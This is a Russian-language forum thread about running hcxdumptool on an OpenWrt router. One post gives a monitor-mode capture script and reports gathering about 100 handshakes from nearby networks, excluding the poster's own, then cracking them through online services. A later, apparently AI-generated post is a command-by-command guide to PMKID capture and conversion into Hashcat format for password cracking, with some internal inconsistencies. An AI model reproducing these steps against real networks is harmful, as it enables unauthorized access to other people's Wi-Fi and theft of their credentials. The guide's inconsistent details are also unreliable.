/* СТИЛИ */

[#DCBEELINEKZ] БИЛАЙН ХАБЫ КАЗАХСТАН

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » [#DCBEELINEKZ] БИЛАЙН ХАБЫ КАЗАХСТАН » [OPENWRT/LEDE ] » [Хак] Проверь свой роутер на уязвимость с помощью hcxdumptool Openwrt.


[Хак] Проверь свой роутер на уязвимость с помощью hcxdumptool Openwrt.

Сообщений 1 страница 3 из 3

1

Кому интересно, на гитхабе есть неплохой сборник различных утилит для OpenWRT.

Источник: https://forum.antichat.club/threads/429 … st-4538403

Я подключил внешний WiFI адаптер rt2800 к роутеру ZBT WE826-T2 (брал алике, ради 3G/LTE модема). Прошивка OpenWRT есть на 4pda.

Для сбора хендшейков использовал утилиту hcxdumptool, запускал таким скриптом (start.sh):

Код:
#!/bin/bash
ifconfig rt2800usbM down
iwconfig rt2800usbM mode monitor
ifconfig rt2800usbM up
iwconfig rt2800usbM txpower 30
cd /root/hack
d=$(date +%Y-%m-%d_%H-%M-%S)
echo "$d"
hcxdumptool -o OWRT_$d.pcapng -i rt2800usbM --enable_status 15 --filtermode=1 --filterlist_ap=filter.txt
exit

filter.txt - список МАСов, которые не нужно перехватывать, к примеру уже перехваченные или от своих устройств. Формат:

Код:
002067fdbd31 # комментарий

На выходе получаем файл вида OWRT_2023-12-25_10-25-28.pcapng

За три дня работы набралось около 100 хендшейков, при этом роутер свою основную работу по маршрутизации и раздаче вайфай продолжал выполнять.

Для расшифровки использую
https://wpa-sec.stanev.org и https://www.onlinehashcrack.com

--------
Сборник от adde88, если что, содержит пакеты, собранные под конкретные архитектуру процессора и версию openwrt.
в общем случае эти утилиты надо собирать самому из исходников в buildroot под свою систему.

https://github.com/adde88/openwrt-useful-tools-src
хотя конкретно hcxdumptool и hcxtools есть в репозитории openwrt, и их можно просто скачать оттуда.

0

2

https://hackware.ru/?p=6672

0

3

Установка и настройка `hcxdumptool` на OpenWrt требует использования стороннего репозитория, так как в официальных пакетах утилита отсутствует. Основной проект для портирования — **adde88/hcxtools-hcxdumptool-openwrt**{{{5|https://github.com/adde88/hcxtools-hcxdumptool-openwrt|[]|[]|GitHub - adde88/hcxtools-hcxdumptool-openwrt: A repo containing...}}}.

### 1. Подготовка роутера

Для работы инструментов аудита Wi-Fi (включая захват PMKID) критически важен совместимый беспроводной адаптер. Большинство встроенных чипов современных роутеров не поддерживают режим монитора или инжекцию пакетов из-за ограничений драйверов *mac80211*.
*   Рекомендуется использовать внешний USB-адаптер с чипсетом Atheros (например, AR9271 в Alfa AWUS036NHA) или Mediatek.
*   Убедитесь, что ваш роутер имеет свободный USB-порт и достаточное питание для адаптера.

Обновите списки пакетов:
```bash
opkg update
```

Установите необходимые зависимости (библиотеки захвата пакетов и инструменты управления интерфейсом):
```bash
opkg install libpcap libcurl libpthread libopenssl zlib iw wireless-tools
```
Если планируется использование GPS-модуля:
```bash
opkg install gpsd-clients libgps
```

### 2. Установка hcxdumptool

Существует два способа: установка готового пакета (*IPK*) или компиляция из исходного кода.

**Способ А: Готовый IPK (рекомендуемый)**
Перейдите в раздел Releases на GitHub проекта adde88. Найдите файл `.ipk`, соответствующий архитектуре вашего процессора (чаще всего это `mipsel_24kc` для устройств на базе MT7621/MT7628, `arm_cortex-a15_neon-vfpv4` или `aarch64_cortex-a53`).

Скачайте и установите его через терминал:
```bash
# Пример для архитектуры mipsel
wget https://github.com/adde88/hcxtools-hcxd … l_24kc.ipk
opkg install ./hcxdumptool_vX.Y.Z_mipsel_24kc.ipk
```
*(Замените X.Y.Z на актуальную версию релиза)*.

**Способ Б: Компиляция из исходников (через SDK Image Builder)**
Этот метод нужен, если готовых бинарников под вашу архитектуру нет.
1. Настройте окружение разработчика OpenWrt (SDK).
2. Склонируйте репозиторий:
   ```bash
   git clone https://github.com/adde88/hcxtools-hcxd … penwrt.git package/hcxdumptool
   ```
3. Выполните сборку пакета:
   ```bash
   make package/hcxdumptool/compile V=s
   ```
Готовый файл `.ipk` появится в директории `bin/packages/<архитектура>/base/`.

### 3. Настройка сетевого интерфейса

Стандартный интерфейс (`wlan0`) должен быть переведен в режим монитора.

1. Выгрузите интерфейс из-под управления Network Manager OpenWrt:
   ```bash
   wifi down
   ```
2. Переведите физический интерфейс в режим монитора. Имя интерфейса может отличаться (например, `phy0-ap0`). Используйте команду `iw dev`, чтобы увидеть список доступных физических интерфейсов:
   ```bash
   # Сначала создаем мониторный интерфейс
   iw phy phy0 interface add mon0 type monitor
   
   # Поднимаем его
   ip link set mon0 up
   
   # Отключаем управление Network Manager для этого устройства, чтобы избежать конфликтов
   ubus call network.interface notify_proto '{ "action": 0, "interface": "mon0" }' 2>/dev/null || true
   ```
   *Примечание: В некоторых случаях достаточно просто выполнить `airmon-ng start wlan0`, если у вас установлен пакет aircrack-ng.*

### 4. Захват данных (PMKID)

Основная задача `hcxdumptool` — запросить кадр PMKID от точки доступа. Это позволяет атаковать сети WPA/WPA2 без необходимости ждать подключения клиента и проводить деаутентификацию.

Базовая команда запуска:
```bash
hcxdumptool -i mon0 -o capture.pcapng --enable_status=1
```
Флаг `--enable_status=1` включает отображение статуса в реальном времени. Утилита будет работать бесконечно, пока вы не нажмете `Ctrl+C`. Для успешного захвата обычно требуется держать инструмент активным от 1 до 10 минут.

**Разбор битмасок флага `--enable_status`:**
| Значение | Компонент |
| :--- | :--- |
| 1 | EAPOL |
| 2 | ASSOCIATION / REASSOCIATION |
| 4 | AUTHENTICATION |
| 8 | BEACON / PROBERESPONSE |
| 16 | ROGUE AP |
| 32 | GPS |
| 64 | Internal status |

Чтобы видеть всё, кроме серверных функций, используйте сумму флагов: $1+2+4+8+16 = 31${{{5|https://github.com/adde88/hcxtools-hcxdumptool-openwrt|[]|[]|GitHub - adde88/hcxtools-hcxdumptool-openwrt: A repo containing...}}}.

### 5. Обработка дампа

После остановки `hcxdumptool` необходимо извлечь хэш из полученного файла `capture.pcapnh`. Для этого используется утилита `hcxpcapngtool` (она устанавливается вместе с `hcxdumptool` из того же репозитория):
```bash
hcxpcapngtool -o hash.hc22000 capture.pcapng
```
Полученный файл `hash.hc22000` содержит данные в формате, готовом для взлома пароля в Hashcat (режим 22000).

### Типичные проблемы и решения

*   **Ошибка `ioctl(SIOCSIWMODE) failed: Device or resource busy`**: Интерфейс занят системными службами OpenWrt. Перед запуском выполните `/etc/init.d/network stop` или убедитесь, что демон `hostapd/wpad` не удерживает радио.
*   **Интерфейс исчезает после команды `wifi`**: Драйвер ядра автоматически пересоздает интерфейсы при перезапуске службы Wi-Fi. Всегда создавайте новый мониторный интерфейс командой `iw ... interface add ... type monitor` уже после того, как штатные интерфейсы поднялись, либо блокируйте их автозагрузку в конфигурации `/etc/config/wireless`.
*   **Нет поддержки режима монитора**: Если команда `iw list` не показывает `* monitor` в разделе supported interface modes, ваш радиочип заблокирован производителем на аппаратном уровне. Программно обойти это невозможно, потребуется замена адаптера.{{{1|https://support.kaspersky.ru/sd-wan/2.4/287103|[]|[]|Запуск утилиты OpenFlow dump}}}{{{2|https://labex.io/ru/tutorials/kali-use-hcxdumptool-to-capture-handshakes-for-fluxion-594486|[]|[]|Захват Wi-Fi handshake с помощью hcxdumptool для Fluxion | LabEx}}}{{{3|https://codeby.net/threads/wifi-adapter-dlya-khakinga-2025-polnoye-rukovodstvo-po-vyboru-i-nastroike-dlya-kali-linux.88405/|[]|[]|WiFi адаптер для хакинга 2025: ТОП-7 для Kali Linux + гайд}}}{{{4|https://codeby.net/threads/novaya-ataka-na-wpa-wpa2-wpa3-psk-s-ispol-zovaniyem-pmkid.64384/|[]|[]|Новая атака на WPA/WPA2/WPA3-PSK с использованием PMKID}}}

0


Вы здесь » [#DCBEELINEKZ] БИЛАЙН ХАБЫ КАЗАХСТАН » [OPENWRT/LEDE ] » [Хак] Проверь свой роутер на уязвимость с помощью hcxdumptool Openwrt.